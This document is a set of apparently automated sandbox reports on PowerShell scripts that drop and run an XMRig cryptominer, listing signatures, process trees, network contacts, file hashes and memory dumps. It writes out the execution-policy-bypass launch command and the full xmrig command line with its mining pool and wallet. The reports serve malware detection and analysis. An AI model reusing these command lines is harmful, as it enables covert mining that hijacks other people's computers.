memory/3936-93-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-94-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-95-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-96-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-97-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-98-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-99-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-100-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-101-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-102-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-103-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-104-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-105-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-106-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-107-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-108-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-109-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-110-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-111-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-112-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-113-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-114-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-115-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-116-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x0000026820C10000-0x0000026820C32000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x0000026820DC0000-0x0000026820E36000-memory.dmp

memory/3508-15-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfccs3zs.tye.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x0000026820DA0000-0x0000026820DB2000-memory.dmp

memory/3508-61-0x0000026820D80000-0x0000026820D8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3708-90-0x000001A53DF90000-0x000001A53DFB0000-memory.dmp

memory/3508-91-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3708-93-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-95-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-96-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-97-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-98-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-99-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-100-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-101-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-102-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-103-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-104-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-105-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-106-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-107-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-108-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-109-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-110-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-111-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-112-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-113-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-114-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-115-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-116-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-117-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-118-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-119-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-120-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-121-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-122-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-123-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-124-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-125-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-126-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-127-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-128-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-129-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-130-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-131-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-132-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-133-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-134-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-135-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-136-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-137-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-138-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-139-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-140-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-141-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-142-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-143-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-144-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-145-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-146-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-147-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-148-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-149-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-150-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-151-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-152-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-153-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-154-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-155-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-156-0x00007FF787B20000-0x00007FF788753000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:35

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3800-3-0x00007FF8BF313000-0x00007FF8BF314000-memory.dmp

memory/3800-5-0x0000020FFCD00000-0x0000020FFCD22000-memory.dmp

memory/3800-8-0x00007FF8BF310000-0x00007FF8BFCFC000-memory.dmp

memory/3800-10-0x00007FF8BF310000-0x00007FF8BFCFC000-memory.dmp

memory/3800-9-0x0000020FFCE30000-0x0000020FFCEA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kndtbgr4.q0m.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3800-25-0x00007FF8BF310000-0x00007FF8BFCFC000-memory.dmp

memory/3800-48-0x0000020FE47D0000-0x0000020FE47E2000-memory.dmp

memory/3800-61-0x0000020FE47A0000-0x0000020FE47AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2800-90-0x00000154537B0000-0x00000154537D0000-memory.dmp

memory/2800-91-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/3800-93-0x00007FF8BF313000-0x00007FF8BF314000-memory.dmp

memory/2800-92-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/3800-94-0x00007FF8BF310000-0x00007FF8BFCFC000-memory.dmp

memory/3800-95-0x00007FF8BF310000-0x00007FF8BFCFC000-memory.dmp

memory/2800-96-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-97-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-98-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-99-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-100-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-101-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-102-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-103-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-104-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-105-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-106-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-107-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-108-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-109-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-110-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-111-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-112-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-113-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-114-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-115-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-116-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-117-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-118-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-119-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-120-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-121-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-122-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-123-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-124-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-125-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-126-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-127-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-128-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-129-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-130-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-131-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-132-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-133-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-134-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-135-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-136-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-137-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-138-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-139-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-140-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-141-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-142-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-143-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-144-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-145-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-146-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-147-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-148-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-149-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-150-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-151-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-152-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-153-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-154-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-155-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

memory/2800-156-0x00007FF61F010000-0x00007FF61FC43000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:42

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.21:443 tcp

Files

memory/5000-0-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jh5pxk3e.nun.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5000-9-0x0000021676AC0000-0x0000021676AE2000-memory.dmp

memory/5000-10-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp

memory/5000-11-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp

memory/5000-12-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp

memory/5000-14-0x0000021676B30000-0x0000021676B42000-memory.dmp

memory/5000-15-0x0000021676B20000-0x0000021676B2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2276-46-0x0000029409530000-0x0000029409550000-memory.dmp

memory/2276-47-0x000002940ACA0000-0x000002940ACC0000-memory.dmp

memory/2276-48-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/5000-49-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp

memory/2276-51-0x000002940ACE0000-0x000002940AD00000-memory.dmp

